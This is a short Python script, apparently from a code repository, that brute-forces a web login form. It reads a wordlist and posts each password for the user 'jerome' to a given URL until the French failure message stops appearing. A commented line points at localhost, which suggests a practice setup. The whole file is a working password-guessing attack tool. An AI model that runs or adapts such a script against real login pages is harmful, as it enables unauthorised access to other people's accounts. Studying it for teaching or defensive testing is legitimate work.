bruteforce.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

import sys
import requests 

def bruteforce(url,username,password):
    reponse=requests.post(url=url,data={
    "username":username,
    "password":password
    })
    #print(reponse.text)
    if "Mauvais mot de passe" in reponse.text:
        #print("mauvais pwd")
        return False
    else:
        print(f"Trouvé password \"{password}\"")
        return True

if __name__ == "__main__":
    url = sys.argv[1]
    dico = sys.argv[2]
    with open(dico, 'r') as wordlist:
        for password in wordlist.readlines():
            password=password.strip()
            if bruteforce(url,"jerome",password)==True:
                sys.exit()

#bruteforce("http://localhost/page.php","jerome","secret")